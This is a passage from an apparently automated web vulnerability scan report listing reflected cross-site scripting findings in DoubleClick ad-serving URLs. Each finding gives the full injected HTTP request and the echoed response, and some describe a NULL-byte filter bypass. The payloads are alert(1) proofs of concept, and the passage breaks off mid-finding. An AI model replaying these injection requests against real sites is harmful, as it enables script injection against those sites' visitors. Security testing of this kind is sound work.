Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:08:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
g.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=6e22b"-alert(1)-"4bbc9e4800b&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallows
...[SNIP]...

3.80. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4856"-alert(1)-"43dc123b662 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cnf4856"-alert(1)-"43dc123b662&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:01:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3af6/17/127/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cnf4856"-alert(1)-"43dc123b662&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=5
...[SNIP]...

3.81. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00c801b"-alert(1)-"acd16220e0c was submitted in the oepartner parameter. This input was echoed as c801b"-alert(1)-"acd16220e0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=%00c801b"-alert(1)-"acd16220e0c&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5461
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 22:07:24 GMT
Expires: Wed, 27 Apr 2011 22:07:24 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=%00c801b"-alert(1)-"acd16220e0c&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0
...[SNIP]...

3.82. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e14e"-alert(1)-"ff222b8ffeb was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=2e14e"-alert(1)-"ff222b8ffeb&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:05:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5452

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
7/%2a/z%3B240123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=2e14e"-alert(1)-"ff222b8ffeb&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11
...[SNIP]...

3.83. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f40e8"-alert(1)-"168af111c1f was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100f40e8"-alert(1)-"168af111c1f&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:06:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5452

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
0123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100f40e8"-alert(1)-"168af111c1f&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.
...[SNIP]...

3.84. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0042f87"-alert(1)-"8498af5b338 was submitted in the pt parameter. This input was echoed as 42f87"-alert(1)-"8498af5b338 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=%0042f87"-alert(1)-"8498af5b338&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5576
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 22:04:37 GMT
Expires: Wed, 27 Apr 2011 22:04:37 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
3Dv8/3af6/17/126/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=%0042f87"-alert(1)-"8498af5b338&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_
...[SNIP]...

3.85. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0061853"-alert(1)-"3d4531fc5aa was submitted in the rqid parameter. This input was echoed as 61853"-alert(1)-"3d4531fc5aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E%0061853"-alert(1)-"3d4531fc5aa&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5588
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 22:06:51 GMT
Expires: Wed, 27 Apr 2011 22:06:51 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
0/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E%0061853"-alert(1)-"3d4531fc5aa&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA")
...[SNIP]...

3.86. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0030da6"-alert(1)-"9f29d88889c was submitted in the sg parameter. This input was echoed as 30da6"-alert(1)-"9f29d88889c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741%0030da6"-alert(1)-"9f29d88889c&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5588
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 22:00:34 GMT
Expires: Wed, 27 Apr 2011 22:00:34 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
ape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/12a/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741%0030da6"-alert(1)-"9f29d88889c&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.2
...[SNIP]...

3.87. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 592c7"-alert(1)-"714a4705579 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00592c7"-alert(1)-"714a4705579&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
53A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00592c7"-alert(1)-"714a4705579&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "fal
...[SNIP]...

3.88. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22207"-alert(1)-"42033c76780 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=5522207"-alert(1)-"42033c76780&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
160/%2a/i%3B234979442%3B2-0%3B0%3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=5522207"-alert(1)-"42033c76780&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=13039
...[SNIP]...

3.89. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85b43"-alert(1)-"5c6dd508a9d was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=085b43"-alert(1)-"5c6dd508a9d&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
